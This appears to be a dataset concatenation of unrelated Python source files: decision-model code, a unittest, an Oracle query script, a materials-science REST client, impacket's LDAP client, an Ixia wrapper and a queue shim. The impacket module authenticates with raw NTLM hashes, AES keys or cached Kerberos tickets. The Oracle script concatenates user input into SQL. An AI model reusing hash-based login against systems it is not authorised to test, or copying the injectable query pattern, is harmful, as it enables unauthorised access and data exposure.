        Uses the actual_likelihood information from the Outcome objects included in
        this decision's Option to sample a set of Outcomes and assigns those to
        self.outcomes. Will raise a RuntimeError if an option hasn't been chosen.
        """
        if not self.option:
            raise RuntimeError(
                "Can't roll outcomes for a decision before knowing which option was "
                "selected."
            )
        self.outcomes = self.option.sample_outcomes()

    def add_prospective_impressions(self, priority_method, mode_of_engagement):
        """
        Adds prospective impressions (and the derived factored decision models
        and goal relevance) based on the given priority method and mode of
        engagement. May only be called once per Decision.
        """
        if (
            self.prospective_impressions is not None
         or self.goal_relevance is not None
        ):
            raise RuntimeError(
                "Attempted to add prospective impressions to a decision which already "
                "has them."
            )
        self.prospective_impressions = mode_of_engagement.build_decision_model(
            self.choice
        )
        (
            self.factored_decision_models,
            self.goal_relevance
        ) = mode_of_engagement.get_factored_decision_model(
            self.choice,
            priority_method,
            dm=self.prospective_impressions
        )

    def add_retrospective_impressions(self):
        """
        Adds retrospective impressions based on the prospective impressions and
        actual outcomes. Calls roll_outcomes if necessary.
        """
        if (
            self.retrospective_impressions is not None
         or self.simplified_retrospectives is not None
        ):
            raise RuntimeError(
                "Attempted to add retrospective impressions to a decision which "
                "already had them."
            )
        self.retrospective_impressions = {}
        if not self.outcomes:
            self.roll_outcomes()
        # Decision models are keyed by option *name* (see
        # build_decision_model and the decision methods above), so index with
        # the chosen option's name rather than the Option object itself.
        chosen_prospectives = self.prospective_impressions[self.option.name]
        # for each goal in prospective impressions for the chosen option
        for goal in chosen_prospectives:
            self.retrospective_impressions[goal] = []
            # for each prospective impression of that goal
            for pri in chosen_prospectives[goal]:
                # sort through actual outcomes to find effects on that goal
                for on in self.outcomes:
                    out = self.outcomes[on]
                    if goal in out.goal_effects:
                        # add a retrospective impression for each prospective/outcome pair
                        val = out.goal_effects[goal]
                        self.retrospective_impressions[goal].append(
                            perception.Retrospective(
                                goal=goal,
                                choice=self.choice.name,
                                option=self.option.name,
                                outcome=out.name,
                                prospective=pri,
                                salience=1.0, # TODO: retrospective saliences would hook in here
                                valence=val
                            )
                        )
        # Also create bundled simplified retrospective impressions
        self.add_simplified_retrospectives()

    def add_simplified_retrospectives(self):
        """
        Fills in simplified retrospective impressions from full retrospectives.
        Normally it's not necessary to call this manually, and it's an error to
        call it if simplified retrospectives have already been added.
        """
        if self.simplified_retrospectives:
            raise RuntimeError(
                "Attempted to add simplified retrospectives to a decision which "
                "already had them."
            )
        self.simplified_retrospectives = {}
        for goal in self.retrospective_impressions:
            ilist = self.retrospective_impressions[goal]
            self.simplified_retrospectives[goal] = \
                perception.Retrospective.merge_retrospective_impressions(ilist)
| StarcoderdataPython |
3471565 | <filename>Python/TurnTicketDispenser/test_turn_ticket.py
import unittest
from turn_ticket import TicketDispenser
class TicketDispenserTest(unittest.TestCase):
    """Tests for the TicketDispenser turn-ticket machine."""

    def test_do_something(self):
        dispenser = TicketDispenser()
        ticket = dispenser.getTurnTicket()
        # The original test made no assertion at all, so it could never fail.
        # At minimum, a freshly dispensed ticket must be some actual value
        # (0 is a plausible first ticket, so don't assert truthiness).
        self.assertIsNotNone(ticket)
# Run the test suite when this file is executed directly.
if __name__ == "__main__":
    unittest.main()
3479197 | <filename>survol/sources_types/oracle/schema/oracle_schema_package_bodies.py<gh_stars>1-10
#!/usr/bin/env python
"""
Oracle package bodies
"""
import sys
import logging
from lib_properties import pc
import lib_oracle
import lib_common
from sources_types.oracle import schema as oracle_schema
from sources_types.oracle import package_body as oracle_package_body
def Main():
    """
    CGI entry point: lists the PL/SQL package bodies belonging to one Oracle
    schema and emits them as an RDF graph linked to the schema node.
    """
    cgi_env = lib_oracle.OracleEnv()
    schema_name = cgi_env.m_entity_id_dict["Schema"]
    grph = cgi_env.GetGraph()

    # NOTE(review): the schema name is interpolated straight into the SQL
    # text; it originates from the CGI environment, so parameter binding
    # would be preferable if lib_oracle.ExecuteQuery supports it -- confirm.
    sql_query = (
        "SELECT OBJECT_NAME,STATUS,CREATED FROM ALL_OBJECTS"
        " WHERE OBJECT_TYPE = 'PACKAGE BODY' AND OWNER = '"
        + schema_name + "'"
    )
    logging.debug("sql_query=%s", sql_query)

    schema_node = oracle_schema.MakeUri(cgi_env.m_oraDatabase, schema_name)

    rows = lib_oracle.ExecuteQuery(cgi_env.ConnectStr(), sql_query)
    logging.debug("num_package_bodies=%d", len(rows))

    for row in rows:
        body_name = str(row[0])
        body_node = oracle_package_body.MakeUri(
            cgi_env.m_oraDatabase, schema_name, body_name
        )
        grph.add((schema_node, pc.property_oracle_package_body, body_node))
        lib_oracle.AddLiteralNotNone(grph, body_node, "Status", row[1])
        lib_oracle.AddLiteralNotNone(grph, body_node, "Creation", row[2])

    cgi_env.OutCgiRdf("LAYOUT_RECT", [pc.property_oracle_package_body])


if __name__ == '__main__':
    Main()
| StarcoderdataPython |
163121 | <reponame>jmmshn/api
from typing import List, Optional, Tuple
from collections import defaultdict
import warnings
from mp_api.core.client import BaseRester
from mp_api.gb.models import GBTypeEnum
class GBRester(BaseRester):
    """Materials Project REST client for grain-boundary documents."""

    # Endpoint suffix appended to the base API URL by BaseRester.
    suffix = "gb"

    def search_gb_docs(
        self,
        task_ids: Optional[List[str]] = None,
        gb_energy: Optional[Tuple[float, float]] = None,
        separation_energy: Optional[Tuple[float, float]] = None,
        rotation_angle: Optional[Tuple[float, float]] = None,
        sigma: Optional[int] = None,
        type: Optional[GBTypeEnum] = None,
        chemsys: Optional[str] = None,
        num_chunks: Optional[int] = None,
        chunk_size: int = 100,
        fields: Optional[List[str]] = None,
    ):
        """
        Query grain boundary docs using a variety of search criteria.

        Arguments:
            task_ids (List[str]): List of Materials Project IDs to query with.
            gb_energy (Tuple[float,float]): Minimum and maximum grain boundary energy
                to consider. (NOTE(review): the original said J/m³; grain-boundary
                energies are conventionally per unit area, J/m² -- confirm against
                the GB endpoint docs.)
            separation_energy (Tuple[float,float]): Minimum and maximum work of
                separation energy to consider (same unit caveat as gb_energy).
            rotation_angle (Tuple[float,float]): Minimum and maximum rotation angle in degrees to consider.
            sigma (int): Sigma value of grain boundary.
            type (GBTypeEnum): Grain boundary type. (Shadows the builtin ``type``
                inside this method; kept for API compatibility.)
            chemsys (str): Dash-delimited string of elements in the material.
            num_chunks (int): Maximum number of chunks of data to yield. None will yield all possible.
            chunk_size (int): Number of data entries per chunk (clamped to 1-100).
            fields (List[str]): List of fields in GBDoc to return data for.
                Default is material_id only.

        Yields:
            ([dict]) List of dictionaries containing data for entries defined in 'fields'.
            Defaults to Materials Project IDs and last updated data.
        """
        query_params = defaultdict(dict)  # type: dict

        # Clamp to the server-supported page size.
        if chunk_size <= 0 or chunk_size > 100:
            warnings.warn("Improper chunk size given. Setting value to 100.")
            chunk_size = 100

        if task_ids:
            query_params.update({"task_ids": ",".join(task_ids)})

        if gb_energy:
            query_params.update(
                {"gb_energy_min": gb_energy[0], "gb_energy_max": gb_energy[1]}
            )

        if separation_energy:
            query_params.update(
                {
                    "w_sep_energy_min": separation_energy[0],
                    "w_sep_energy_max": separation_energy[1],
                }
            )

        if rotation_angle:
            query_params.update(
                {
                    "rotation_angle_min": rotation_angle[0],
                    "rotation_angle_max": rotation_angle[1],
                }
            )

        if sigma:
            query_params.update({"sigma": sigma})

        if type:
            query_params.update({"type": type})

        if chemsys:
            query_params.update({"chemsys": chemsys})

        if fields:
            query_params.update({"fields": ",".join(fields)})

        # Drop any None-valued parameters before sending.
        query_params = {
            entry: query_params[entry]
            for entry in query_params
            if query_params[entry] is not None
        }

        query_params.update({"limit": chunk_size, "skip": 0})
        count = 0
        # Page through results until the server returns nothing or the
        # requested number of chunks has been yielded.
        while True:
            query_params["skip"] = count * chunk_size
            results = self.query(query_params).get("data", [])

            if not any(results) or (num_chunks is not None and count == num_chunks):
                break

            count += 1
            yield results
| StarcoderdataPython |
6649157 | # Copyright (c) 2016 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author: <NAME> (@agsolino)
#
# Description:
# RFC 4511 Minimalistic implementation. We don't need much functionality yet
# If we need more complex use cases we might opt to use a third party implementation
# Keep in mind the APIs are still unstable, might require to re-write your scripts
# as we change them.
# Adding [MS-ADTS] specific functionality
#
# ToDo:
# [ ] Implement Paging Search, especially important for big requests
#
import socket
import os
from binascii import unhexlify
from pyasn1.codec.der import decoder, encoder
from pyasn1.error import SubstrateUnderrunError
from impacket import LOG
from impacket.ldap.ldapasn1 import BindRequest, Integer7Bit, LDAPDN, AuthenticationChoice, AuthSimple, LDAPMessage, \
SCOPE_SUB, SearchRequest, Scope, DEREF_NEVER, DeRefAliases, IntegerPositive, Boolean, AttributeSelection, \
SaslCredentials, LDAPString, ProtocolOp, Credentials
from impacket.ntlm import getNTLMSSPType1, getNTLMSSPType3
from impacket.spnego import SPNEGO_NegTokenInit, TypesMech
try:
import OpenSSL
from OpenSSL import SSL, crypto
except:
LOG.critical("pyOpenSSL is not installed, can't continue")
raise
class LDAPConnection:
def __init__(self,url, baseDN='dc=net', dstIp = None):
"""
LDAPConnection class
:param string url:
:param string baseDN:
:param string dstIp:
:return: a LDAP instance, if not raises a LDAPSessionError exception
"""
self._SSL = False
self._dstPort = 0
self._dstHost = 0
self._socket = None
self._baseDN = baseDN
self._messageId = 1
self._dstIp = dstIp
if url.startswith("ldap://"):
self._dstPort = 389
self._SSL = False
self._dstHost = url[7:]
elif url.startswith("ldaps://"):
#raise LDAPSessionError(errorString = 'LDAPS still not supported')
self._dstPort = 636
self._SSL = True
self._dstHost = url[8:]
else:
raise LDAPSessionError(errorString = 'Unknown URL prefix %s' % url)
# Try to connect
if self._dstIp is not None:
targetHost = self._dstIp
else:
targetHost = self._dstHost
LOG.debug('Connecting to %s, port %s, SSL %s' % (targetHost, self._dstPort, self._SSL))
try:
af, socktype, proto, canonname, sa = socket.getaddrinfo(targetHost, self._dstPort, 0, socket.SOCK_STREAM)[0]
self._socket = socket.socket(af, socktype, proto)
except socket.error, e:
raise socket.error("Connection error (%s:%s)" % (targetHost, 88), e)
if self._SSL is False:
self._socket.connect(sa)
else:
# Switching to TLS now
ctx = SSL.Context(SSL.TLSv1_METHOD)
#ctx.set_cipher_list('RC4')
self._socket = SSL.Connection(ctx, self._socket)
self._socket.connect(sa)
self._socket.do_handshake()
    def kerberosLogin(self, user, password, domain='', lmhash='', nthash='', aesKey='', kdcHost=None, TGT=None,
                      TGS=None, useCache=True):
        """
        logins into the target system explicitly using Kerberos. Hashes are used if RC4_HMAC is supported.

        :param string user: username
        :param string password: password for the account (ignored when hashes or aesKey are supplied)
        :param string domain: domain where the account is valid for (required)
        :param string lmhash: LMHASH used to authenticate using hashes (password is not used)
        :param string nthash: NTHASH used to authenticate using hashes (password is not used)
        :param string aesKey: aes256-cts-hmac-sha1-96 or aes128-cts-hmac-sha1-96 used for Kerberos authentication
        :param string kdcHost: hostname or IP Address for the KDC. If None, the domain will be used (it needs to resolve tho)
        :param struct TGT: If there's a TGT available, send the structure here and it will be used
        :param struct TGS: same for TGS. See smb3.py for the format
        :param bool useCache: whether or not we should use the ccache for credentials lookup. If TGT or TGS are specified this is False

        :return: True, raises a LDAPSessionError if error.
        """
        # Normalize hex-encoded hashes: pad to an even number of digits, then
        # convert to raw bytes (a failure means they were already raw).
        if lmhash != '' or nthash != '':
            if len(lmhash) % 2: lmhash = '0%s' % lmhash
            if len(nthash) % 2: nthash = '0%s' % nthash
            try: # just in case they were converted already
                lmhash = unhexlify(lmhash)
                nthash = unhexlify(nthash)
            except:
                pass

        # Importing down here so pyasn1 is not required if kerberos is not used.
        from impacket.krb5.ccache import CCache
        from impacket.krb5.asn1 import AP_REQ, Authenticator, TGS_REP, seq_set
        from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
        from impacket.krb5 import constants
        from impacket.krb5.types import Principal, KerberosTime, Ticket
        from pyasn1.codec.der import decoder, encoder
        import datetime

        # Explicit tickets take precedence over the credential cache.
        if TGT is not None or TGS is not None:
            useCache = False

        if useCache is True:
            try:
                ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
            except:
                # No cache present
                pass
            else:
                # retrieve user and domain information from CCache file if needed
                if user == '' and len(ccache.principal.components) > 0:
                    user = ccache.principal.components[0]['data']
                if domain == '':
                    domain = ccache.principal.realm['data']
                LOG.debug("Using Kerberos Cache: %s" % os.getenv('KRB5CCNAME'))
                # Prefer a cached service ticket for this LDAP server; fall
                # back to a cached TGT for the realm.
                principal = 'ldap/%s@%s' % (self._dstHost.upper(), domain.upper())
                creds = ccache.getCredential(principal)
                if creds is None:
                    # Let's try for the TGT and go from there
                    principal = 'krbtgt/%s@%s' % (domain.upper(), domain.upper())
                    creds = ccache.getCredential(principal)
                    if creds is not None:
                        TGT = creds.toTGT()
                        LOG.debug('Using TGT from cache')
                    else:
                        LOG.debug("No valid credentials found in cache. ")
                else:
                    TGS = creds.toTGS()
                    LOG.debug('Using TGS from cache')

        # First of all, we need to get a TGT for the user
        userName = Principal(user, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
        if TGT is None:
            if TGS is None:
                tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, password, domain, lmhash, nthash,
                                                                        aesKey, kdcHost)
        else:
            tgt = TGT['KDC_REP']
            cipher = TGT['cipher']
            sessionKey = TGT['sessionKey']

        # With a TGT in hand, request a service ticket for the ldap/ SPN
        # unless one was supplied or found in the cache.
        if TGS is None:
            serverName = Principal('ldap/%s' % self._dstHost,
                                   type=constants.PrincipalNameType.NT_SRV_INST.value)
            tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, domain, kdcHost, tgt, cipher,
                                                                    sessionKey)
        else:
            tgs = TGS['KDC_REP']
            cipher = TGS['cipher']
            sessionKey = TGS['sessionKey']

        # Let's build a NegTokenInit with a Kerberos REQ_AP
        blob = SPNEGO_NegTokenInit()

        # Kerberos
        blob['MechTypes'] = [TypesMech['MS KRB5 - Microsoft Kerberos 5']]

        # Let's extract the ticket from the TGS
        tgs = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
        ticket = Ticket()
        ticket.from_asn1(tgs['ticket'])

        # Now let's build the AP_REQ
        apReq = AP_REQ()
        apReq['pvno'] = 5
        apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)

        opts = list()
        apReq['ap-options'] = constants.encodeFlags(opts)
        seq_set(apReq, 'ticket', ticket.to_asn1)

        authenticator = Authenticator()
        authenticator['authenticator-vno'] = 5
        authenticator['crealm'] = domain
        seq_set(authenticator, 'cname', userName.components_to_asn1)
        now = datetime.datetime.utcnow()

        authenticator['cusec'] = now.microsecond
        authenticator['ctime'] = KerberosTime.to_asn1(now)

        encodedAuthenticator = encoder.encode(authenticator)

        # Key Usage 11
        # AP-REQ Authenticator (includes application authenticator
        # subkey), encrypted with the application session key
        # (Section 5.5.1)
        encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 11, encodedAuthenticator, None)

        apReq['authenticator'] = None
        apReq['authenticator']['etype'] = cipher.enctype
        apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator

        blob['MechToken'] = encoder.encode(apReq)

        # Done with the Kerberos saga, now let's get into LDAP
        # The SPNEGO blob rides in a SASL GSS-SPNEGO bind (see [MS-ADTS]).
        bindRequest = BindRequest()
        bindRequest['version'] = Integer7Bit(3)
        bindRequest['name'] = LDAPDN(user)
        credentials = SaslCredentials()
        credentials['mechanism'] = LDAPString('GSS-SPNEGO')
        credentials['credentials'] = Credentials(blob.getData())
        bindRequest['authentication'] = AuthenticationChoice().setComponentByName('sasl', credentials)

        resp = self.sendReceive('bindRequest', bindRequest)[0]['protocolOp']

        if resp['bindResponse']['resultCode'] != 0:
            raise LDAPSessionError(errorString='Error in bindRequest -> %s:%s' % (
                resp['bindResponse']['resultCode'].prettyPrint(), resp['bindResponse']['diagnosticMessage']))

        return True
    def login(self, user='', password='', domain = '', lmhash = '', nthash = '', authenticationChoice = 'sicilyNegotiate'):
        """
        logins into the target system

        :param string user: username
        :param string password: password for the account (not used when hashes are supplied)
        :param string domain: domain where the account is valid for
        :param string lmhash: LMHASH used to authenticate using hashes (password is not used)
        :param string nthash: NTHASH used to authenticate using hashes (password is not used)
        :param string authenticationChoice: type of authentication protocol to use (default NTLM)

        :return: True, raises a LDAPSessionError if error.
        """
        bindRequest = BindRequest()
        bindRequest['version'] = Integer7Bit(3)
        bindRequest['name'] = LDAPDN(user)

        if authenticationChoice == 'simple':
            # Plain-text simple bind.
            bindRequest['authentication'] = AuthenticationChoice().setComponentByName(authenticationChoice, AuthSimple(password))
            resp = self.sendReceive('bindRequest', bindRequest)[0]['protocolOp']
        elif authenticationChoice == 'sicilyPackageDiscovery':
            # [MS-ADTS] sicily discovery: ask the server which packages it supports.
            bindRequest['authentication'] = AuthenticationChoice().setComponentByName(authenticationChoice, '')
            resp = self.sendReceive('bindRequest', bindRequest)[0]['protocolOp']
        elif authenticationChoice == 'sicilyNegotiate':
            # Deal with NTLM Authentication
            # Normalize hex-encoded hashes: pad to an even digit count, then
            # convert to raw bytes (a failure means they were already raw).
            if lmhash != '' or nthash != '':
                if len(lmhash) % 2: lmhash = '0%s' % lmhash
                if len(nthash) % 2: nthash = '0%s' % nthash
                try: # just in case they were converted already
                    lmhash = unhexlify(lmhash)
                    nthash = unhexlify(nthash)
                except:
                    pass

            # NTLM Negotiate (leg 1 of the three-message NTLM handshake)
            negotiate = getNTLMSSPType1('',domain)
            bindRequest['authentication'] = AuthenticationChoice().setComponentByName('sicilyNegotiate', negotiate)
            resp = self.sendReceive('bindRequest', bindRequest)[0]['protocolOp']

            # NTLM Challenge (leg 2: the server returns it in matchedDN)
            type2 = resp['bindResponse']['matchedDN']

            # NTLM Auth (leg 3)
            type3, exportedSessionKey = getNTLMSSPType3(negotiate, str(type2), user, password, domain, lmhash, nthash)
            bindRequest['authentication'] = AuthenticationChoice().setComponentByName('sicilyResponse', type3)
            resp = self.sendReceive('bindRequest', bindRequest)[0]['protocolOp']
        else:
            raise LDAPSessionError(errorString='Unknown authenticationChoice %s' % authenticationChoice)

        if resp['bindResponse']['resultCode'] != 0:
            raise LDAPSessionError(errorString = 'Error in bindRequest -> %s:%s' % (resp['bindResponse']['resultCode'].prettyPrint(), resp['bindResponse']['diagnosticMessage'] ))

        return True
def search(self, searchBase=None, searchFilter=None, scope=SCOPE_SUB, attributes=None, derefAliases=DEREF_NEVER,
           sizeLimit=0):
    """Issue an LDAP searchRequest and collect replies until searchResDone arrives.

    :param searchBase: DN to search under; defaults to the connection's base DN.
    :param searchFilter: a pre-built Filter instance (no text-filter parsing yet, see ToDo).
    :param scope: search scope constant (default SCOPE_SUB).
    :param attributes: iterable of attribute names to request, or None for all.
    :param derefAliases: alias dereferencing policy (default DEREF_NEVER).
    :param sizeLimit: server-side result limit; 0 means no client-imposed limit.
    :return: list of protocolOp payloads (entries/references) received before searchResDone.
    :raises LDAPSearchError: when searchResDone carries a non-zero resultCode; the
        partial results gathered so far are attached to the exception as ``answers``.
    """
    # ToDo: For now we need to specify a filter as a Filter instance, meaning, we have to programmatically build it
    # ToDo: We have to create functions to parse and compile a text searchFilter into a Filter instance.
    if searchBase is None:
        searchBase = self._baseDN
    searchRequest = SearchRequest()
    searchRequest['baseObject'] = LDAPDN(searchBase)
    searchRequest['scope'] = Scope(scope)
    searchRequest['derefAliases'] = DeRefAliases(derefAliases)
    searchRequest['sizeLimit'] = IntegerPositive(sizeLimit)
    searchRequest['timeLimit'] = IntegerPositive(0)
    searchRequest['typesOnly'] = Boolean(False)
    searchRequest['filter'] = searchFilter
    searchRequest['attributes'] = AttributeSelection()
    if attributes is not None:
        for i, item in enumerate(attributes):
            searchRequest['attributes'][i] = item
    done = False
    answers = []
    # We keep asking records until we get a searchResDone packet
    while not done:
        resp = self.sendReceive('searchRequest', searchRequest)
        for item in resp:
            protocolOp = item['protocolOp']
            if protocolOp.getName() == 'searchResDone':
                done = True
                if protocolOp['searchResDone']['resultCode'] != 0:
                    raise LDAPSearchError(error = int(protocolOp['searchResDone']['resultCode']), errorString = 'Error in searchRequest -> %s:%s' % (protocolOp['searchResDone']['resultCode'].prettyPrint(), protocolOp['searchResDone']['diagnosticMessage'] ), answers=answers)
            else:
                # Any non-done message is part of the result set (entry or reference).
                answers.append(item['protocolOp'][protocolOp.getName()])
    return answers
def close(self):
    """Tear down the underlying transport socket, if one was ever opened."""
    sock = self._socket
    if sock is not None:
        sock.close()
def send(self, protocolOp, message):
    """Wrap *message* in an LDAPMessage under *protocolOp*, BER-encode it and
    write it to the socket.

    The message id comes from self._messageId (incremented elsewhere, in recv).
    Returns whatever socket.sendall returns (None on success).
    """
    ldapMessage = LDAPMessage( )
    ldapMessage['messageID'] = IntegerPositive(self._messageId)
    ldapMessage['protocolOp'] = ProtocolOp().setComponentByName(protocolOp, message)
    data = encoder.encode(ldapMessage)
    return self._socket.sendall(data)
def recv(self):
    """Drain the socket and return every decoded LDAPMessage that was queued.

    Reads in REQUEST_SIZE chunks until a short read, then decodes as many ASN.1
    messages as the buffer holds, topping the buffer up when the decoder runs
    out of substrate mid-message.
    """
    REQUEST_SIZE = 8192
    # NOTE(review): '' + socket bytes only works on Python 2 (str sockets) — confirm target runtime.
    data = ''
    done = False
    while not done:
        recvData = self._socket.recv(REQUEST_SIZE)
        if len(recvData) < REQUEST_SIZE:
            # A short read is treated as "nothing more queued" — TCP does not guarantee this.
            done = True
        data += recvData
    answers = []
    while len(data) > 0:
        try:
            ldapMessage, remaining = decoder.decode(data, asn1Spec = LDAPMessage())
        except SubstrateUnderrunError:
            # We need more data
            remaining = data + self._socket.recv(REQUEST_SIZE)
        else:
            answers.append(ldapMessage)
        data = remaining
        # NOTE(review): message id is bumped once per decode iteration (including
        # underruns) — nesting reconstructed from a whitespace-stripped source; verify upstream.
        self._messageId += 1
    return answers
def sendReceive(self, protocolOp, message):
    """Convenience wrapper: transmit *message* under *protocolOp*, then block
    for and return the server's decoded reply messages."""
    self.send(protocolOp, message)
    answers = self.recv()
    return answers
class LDAPSessionError(Exception):
    """Base exception every LDAP client caller should catch.

    Carries a numeric result code, the packet associated with the failure and a
    human-readable message (which doubles as str(exception)).
    """

    def __init__(self, error=0, packet=0, errorString=''):
        super(LDAPSessionError, self).__init__()
        self.error = error
        self.packet = packet
        self.errorString = errorString

    def getErrorCode(self):
        """Numeric LDAP result code."""
        return self.error

    def getErrorPacket(self):
        """Packet (or placeholder 0) associated with the failure."""
        return self.packet

    def getErrorString(self):
        """Human-readable error description."""
        return self.errorString

    def __str__(self):
        return self.errorString
class LDAPSearchError(LDAPSessionError):
    """Raised when searchResDone reports an error; carries any partial results.

    BUG FIX: the original used a mutable default ``answers=[]``, so every
    exception raised without explicit answers shared (and accumulated into)
    the same list.  ``None`` now stands in for "no answers".
    """

    def __init__(self, error=0, packet=0, errorString='', answers=None):
        LDAPSessionError.__init__(self, error, packet, errorString)
        # Fresh list per instance; still backward compatible for callers
        # that passed an explicit list.
        self.answers = [] if answers is None else answers

    def getAnswers(self):
        """Partial search results gathered before the failure."""
        return self.answers
| StarcoderdataPython |
1874902 | <gh_stars>10-100
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
from typing import List, Any, Union
class Ipv6Prefixes(Base):
    """This object helps to set the prefixes count of IPv6 prefix type.
    The Ipv6Prefixes class encapsulates a list of ipv6Prefixes resources that are managed by the system.
    A list of resources can be retrieved from the server using the Ipv6Prefixes.find() method.

    NOTE: generated REST-SDK wrapper; all attributes are read-only snapshots
    fetched from the server via Base._get_attribute.
    """
    __slots__ = ()
    _SDM_NAME = 'ipv6Prefixes'
    # Maps the Python-visible attribute names to the wire-level SDM attribute names.
    _SDM_ATT_MAP = {
        'Age': 'age',
        'HostName': 'hostName',
        'Ipv6Prefix': 'ipv6Prefix',
        'LearnedVia': 'learnedVia',
        'LspId': 'lspId',
        'Metric': 'metric',
        'SequenceNumber': 'sequenceNumber',
    }
    # No enumerated attributes on this resource.
    _SDM_ENUM_MAP = {
    }

    def __init__(self, parent, list_op=False):
        super(Ipv6Prefixes, self).__init__(parent, list_op)

    @property
    def Age(self):
        # type: () -> int
        """
        Returns
        -------
        - number: The time since last refreshed.
        """
        return self._get_attribute(self._SDM_ATT_MAP['Age'])

    @property
    def HostName(self):
        # type: () -> str
        """
        Returns
        -------
        - str: The host name as retrieved from the related packets.
        """
        return self._get_attribute(self._SDM_ATT_MAP['HostName'])

    @property
    def Ipv6Prefix(self):
        # type: () -> str
        """
        Returns
        -------
        - str: Mask width of IPv6 Prefix.
        """
        return self._get_attribute(self._SDM_ATT_MAP['Ipv6Prefix'])

    @property
    def LearnedVia(self):
        # type: () -> str
        """
        Returns
        -------
        - str: Learned via L1 Adjacency/L2 Adjacency.
        """
        return self._get_attribute(self._SDM_ATT_MAP['LearnedVia'])

    @property
    def LspId(self):
        # type: () -> str
        """
        Returns
        -------
        - str: The LSP number.
        """
        return self._get_attribute(self._SDM_ATT_MAP['LspId'])

    @property
    def Metric(self):
        # type: () -> int
        """
        Returns
        -------
        - number: The route metric.
        """
        return self._get_attribute(self._SDM_ATT_MAP['Metric'])

    @property
    def SequenceNumber(self):
        # type: () -> int
        """
        Returns
        -------
        - number: Sequence number of the LSP containing the route.
        """
        return self._get_attribute(self._SDM_ATT_MAP['SequenceNumber'])

    def add(self):
        """Adds a new ipv6Prefixes resource on the json, only valid with config assistant

        Returns
        -------
        - self: This instance with all currently retrieved ipv6Prefixes resources using find and the newly added ipv6Prefixes resources available through an iterator or index

        Raises
        ------
        - Exception: if this function is not being used with config assistance
        """
        return self._add_xpath(self._map_locals(self._SDM_ATT_MAP, locals()))

    def find(self, Age=None, HostName=None, Ipv6Prefix=None, LearnedVia=None, LspId=None, Metric=None, SequenceNumber=None):
        # type: (int, str, str, str, str, int, int) -> Ipv6Prefixes
        """Finds and retrieves ipv6Prefixes resources from the server.

        All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve ipv6Prefixes resources from the server.
        To retrieve an exact match ensure the parameter value starts with ^ and ends with $
        By default the find method takes no parameters and will retrieve all ipv6Prefixes resources from the server.

        Args
        ----
        - Age (number): The time since last refreshed.
        - HostName (str): The host name as retrieved from the related packets.
        - Ipv6Prefix (str): Mask width of IPv6 Prefix.
        - LearnedVia (str): Learned via L1 Adjacency/L2 Adjacency.
        - LspId (str): The LSP number.
        - Metric (number): The route metric.
        - SequenceNumber (number): Sequence number of the LSP containing the route.

        Returns
        -------
        - self: This instance with matching ipv6Prefixes resources retrieved from the server available through an iterator or index

        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))

    def read(self, href):
        """Retrieves a single instance of ipv6Prefixes data from the server.

        Args
        ----
        - href (str): An href to the instance to be retrieved

        Returns
        -------
        - self: This instance with the ipv6Prefixes resources from the server available through an iterator or index

        Raises
        ------
        - NotFoundError: The requested resource does not exist on the server
        - ServerError: The server has encountered an uncategorized error condition
        """
        return self._read(href)
8150194 | <reponame>magicly/sample-factory
"""
Fake implementation of faster-fifo that just routes all function calls to multiprocessing.Queue.
Can be useful on platforms where faster-fifo does not work, e.g. Windows.
"""
import multiprocessing
from queue import Empty
class Queue:
    """Drop-in stand-in for faster_fifo.Queue backed by multiprocessing.Queue.

    NOTE: multiprocessing.Queue's limit counts items, not bytes, so
    max_size_bytes only approximates the faster-fifo semantics.
    """

    def __init__(self, max_size_bytes=200000):
        self.q = multiprocessing.Queue(max_size_bytes)

    def close(self):
        self.q.close()

    def is_closed(self):
        """Not implemented."""
        return False

    def put(self, x, block=True, timeout=float(1e3)):
        self.q.put(x, block, timeout)

    def put_nowait(self, x):
        return self.put(x, block=False)

    def get_many(self, block=True, timeout=float(1e3), max_messages_to_get=int(1e9)):
        """Fetch up to max_messages_to_get items; only the first fetch may block."""
        messages = []
        try:
            while len(messages) < max_messages_to_get:
                if messages:
                    # Already have one: only drain whatever else is immediately ready.
                    messages.append(self.q.get_nowait())
                else:
                    # First message honours the caller's blocking semantics.
                    messages.append(self.q.get(block, timeout))
        except Empty:
            pass
        return messages

    def get_many_nowait(self, max_messages_to_get=int(1e9)):
        return self.get_many(block=False, max_messages_to_get=max_messages_to_get)

    def get(self, block=True, timeout=float(1e3)):
        return self.get_many(block=block, timeout=timeout, max_messages_to_get=1)[0]

    def get_nowait(self):
        return self.get(block=False)

    def qsize(self):
        return self.q.qsize()

    def empty(self):
        return self.q.empty()

    def full(self):
        return self.q.full()

    def join_thread(self):
        self.q.join_thread()

    def cancel_join_thread(self):
        self.q.cancel_join_thread()
9796435 | from model import Product
class InputView:
